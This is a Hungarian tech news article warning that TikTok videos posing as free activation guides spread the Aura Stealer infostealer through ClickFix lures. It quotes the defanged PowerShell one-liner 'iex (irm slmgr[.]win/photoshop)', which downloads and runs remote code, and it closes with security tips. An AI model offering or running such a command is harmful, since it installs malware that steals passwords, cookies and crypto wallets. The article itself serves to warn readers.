Figyelem: TikTok videók terjesztenek információlopó malware-t hamis aktiválási útmutatókkal

okt 20, 2025 | Tech

Az utóbbi időben egyre gyakoribbá vált, hogy a cyberbűnözők TikTok videókat használnak fel arra, hogy kártékony szoftvereket juttassanak el a felhasználók számítógépeire. Ezek a videók úgy álcázzák magukat, mint ingyenes aktiválási útmutatók népszerű szoftverekhez, például Windows, Spotify vagy Netflix szolgáltatásokhoz, azonban valójában információlopó malware-t terjesztenek.

A kampány felfedezése és jellemzői

A kampányt Xavier Mertens, az ISC Handler szakértője fedezte fel, aki szerint az akció nagyban hasonlít a Trend Micro által 2023 májusában megfigyelt támadássorozathoz. A BleepingComputer által bemutatott videók úgy tesznek, mintha hivatalos aktiválási útmutatókat adnának olyan termékekhez, mint a Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro vagy Discord Nitro. Emellett hamisított szolgáltatásokat is reklámoznak, például Netflix és Spotify Premium verziókat.

A támadás módszere: ClickFix technika

Ezek a TikTok videók egy ClickFix nevű szociális mérnöki technikát alkalmaznak. Ez a módszer úgy jelenít meg „javításokat” vagy utasításokat, hogy azok legitimnek tűnjenek, miközben valójában arra csábítják a felhasználót, hogy káros PowerShell parancsokat vagy más szkripteket futtasson le számítógépén.

Minden videóban megjelenik egy rövid, egysoros parancs, amelyet a nézőknek rendszergazdai jogosultságokkal kell futtatniuk PowerShell-ben. Például:

iex (irm slmgr[.]win/photoshop)

A parancsban szereplő programnév (például „photoshop”) változik attól függően, hogy melyik szoftvert próbálják hamisan aktiválni. Hamis Windows aktiváló videóknál például „windows” szerepel a URL-ben.

A malware működése és veszélyei

Amikor a felhasználó végrehajtja ezt a parancsot, a PowerShell kapcsolódik a távoli slmgr[.]win oldalhoz, ahonnan letölt és futtat egy másik PowerShell szkriptet. Ez a szkript két futtatható fájlt tölt le Cloudflare oldalakról:

  • updater.exe – Ez az Aura Stealer nevű információlopó malware egy változata.
  • source.exe – Egy további payload, amely .NET Visual C# Compiler segítségével önmagát fordítja le és memóriában futtatja a kódot.

Aura Stealer képes ellopni böngészőben tárolt jelszavakat, hitelesítő cookie-kat, kriptotárca adatokat és más alkalmazásokban tárolt bejelentkezési adatokat is. Ezeket az adatokat feltölti a támadóknak, akik így hozzáférhetnek az áldozatok fiókjaihoz.

A második payload célja még nem teljesen ismert, de valószínűleg további károkozásra vagy rejtett tevékenységre használják.

Megelőzés és teendők fertőzés esetén

Ha valaki végrehajtotta ezeket a lépéseket és gyanítja a fertőzést, akkor feltételezheti, hogy minden jelszava kompromittálódott. Azonnal meg kell változtatnia minden online fiókja jelszavát!

Fontos tanácsok:

  • Soha ne másoljon és ne futtasson parancsokat ismeretlen vagy megbízhatatlan forrásból.
  • Tartsa naprakészen operációs rendszerét és vírusvédelmi szoftvereit.
  • Különösen legyen óvatos olyan utasításokkal kapcsolatban, amelyek PowerShell vagy parancssori futtatást kérnek.
  • Használjon erős és egyedi jelszavakat minden szolgáltatáshoz.
  • Kétfaktoros hitelesítést (2FA) alkalmazzon ahol csak lehet.

A ClickFix támadások növekvő népszerűsége

A ClickFix típusú támadások az elmúlt évben jelentősen elterjedtek. Ezeket különféle rosszindulatú programok terjesztésére használják ransomware kampányokban vagy kriptovaluta lopási akciók során. A módszer hatékonysága abban rejlik, hogy megtévesztő módon kínál „gyors megoldásokat”, így sok felhasználó könnyen bedőlhet neki.

Záró gondolatok

A digitális biztonság megőrzése érdekében mindig legyen körültekintő az interneten talált utasításokkal kapcsolatban. A TikTok és más közösségi platformok nemcsak szórakoztatásra szolgálnak – sajnos egyre gyakrabban válnak kiberbűnözők eszközévé is. Ha gyanús tartalmat látunk vagy kétségeink vannak egy adott videóval kapcsolatban, inkább keressünk megbízható forrásokat vagy kérjünk szakértői segítséget.

Ezzel a tudással felvértezve nagyobb eséllyel kerülhetjük el az ilyen típusú kibertámadásokat és védhetjük meg személyes adatainkat.

Forrás: https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/

Grokipedia: Elon Musk új enciklopédiája, amely a Wikipédiára épít

Elon MuskxAI nemrégiben elindított egy új weboldalt, a Grokipediát, amely első ránézésre nagyon hasonlít a jól ismert Wikipédiára. Az oldal célja egy modern, könnyen használható tudásbázis létrehozása, amely állítólag jobb és megbízhatóbb alternatívája lehet a...

Antibiotikumok új korszaka: a pre-methylenomycin C lactone felfedezése a gyógyszerrezisztencia elleni harcban

Az antimikrobiális rezisztencia (AMR) napjaink egyik legsürgetőbb egészségügyi kihívása. A WHO legfrissebb jelentése szerint az antibakteriális szerek fejlesztése háttérbe szorult, és a kereskedelmi ösztönzők hiánya akadályozza az új antibiotikumok felfedezését. Egy...

Foveális felbontás határa és színérzékelés a látótérben – részletes vizsgálat

A foveális felbontás, vagyis a szem központi látóterének maximális részletfelbontása kulcsfontosságú tényező a vizuális élmény és a kijelzők fejlesztése szempontjából. Egy friss kutatás során achromatikus (szürkeárnyalatos), vörös-zöld és sárga-lila minták felbontási...

Patrick Gelsinger és a hit-alapú mesterséges intelligencia forradalma a Gloo élén

2024 márciusában, három hónappal azután, hogy Patrick Gelsingert kényszerítették távozásra az Intel vezérigazgatói posztjáról, és részvényesek pert indítottak ellene, új fejezetet nyitott karrierjében. Átvette a vezetést a Gloo nevű technológiai vállalatnál, amelyet ő...

EU Sovereign Tech Fund: Kulcsfontosságú befektetés az európai nyílt forráskódú szoftverek fenntarthatóságába

A digitális korszakban Európa egyre inkább szembesül azzal a kihívással, hogy technológiai függőségei és globális szoftverszállítási láncainak sebezhetőségei veszélyeztetik digitális szuverenitását, kiberbiztonságát és versenyképességét. Ezen kihívásokra reagálva a...

AWS kiesés és a Signal: Miért nincs alternatíva a nagy felhőszolgáltatóknál?

Az elmúlt héten az Amazon Web Services (AWS) jelentős kiesése nemcsak az internetes szolgáltatásokat érintette, hanem olyan népszerű alkalmazásokat is, mint a titkosított üzenetküldő platform, a Signal. Az esemény után Elon Musk gyorsan bírálta a Signal-t amiatt, hogy...

Indítsd jól a napod! Friss hírek és hasznos tippek közvetlenül az e-mail fiókodba

Az első lépés a sikeres naphoz Mindannyian tudjuk, hogy a nap indítása meghatározza az egész nap hangulatát és hatékonyságát. Egy jól megtervezett reggel segít abban, hogy energikusan, fókuszáltan és motiváltan kezdjük a teendőinket. De hogyan érhetjük el ezt a...

Grokipedia: Elon Musk új enciklopédiája, amely a Wikipédiára épít

Elon MuskxAI nemrégiben elindított egy új weboldalt, a Grokipediát, amely első ránézésre nagyon hasonlít a jól ismert Wikipédiára. Az oldal célja egy modern, könnyen használható tudásbázis létrehozása, amely állítólag jobb és megbízhatóbb alternatívája lehet a...

IBS kezelése: Mediterrán diéta vagy alacsony FODMAP étrend?

Az irritábilis bél szindróma (IBS) sokak életét megnehezíti, és a tünetek enyhítésére számos étrendi megoldás létezik. Az utóbbi időben egyre több bizonyíték támasztja alá, hogy a mediterrán diéta hatékony segítséget nyújthat az IBS tüneteinek enyhítésében, ráadásul...

Amazon tömeges leépítés: 14 000 alkalmazottat érint az AI technológia előkészítése

Az Amazon bejelentette, hogy idén összesen 14 000 vállalati dolgozót bocsát el egy nagyszabású leépítési hullám keretében, amelynek célja a cég felkészítése a mesterséges intelligencia (AI) technológiák széles körű alkalmazására. Ez a lépés jelentős változásokat vetít...

Shrinkfláció: A termékek méretének csökkenése és az árak növekedése a brit boltokban

Shrinkfláció – vagyis a termékek méretének vagy mennyiségének csökkentése úgy, hogy az ár változatlan marad – egyre gyakoribb jelenség a brit élelmiszer- és háztartási cikkek piacán. A fogyasztók ugyanazt az összeget fizetik, miközben kevesebb terméket kapnak, ami...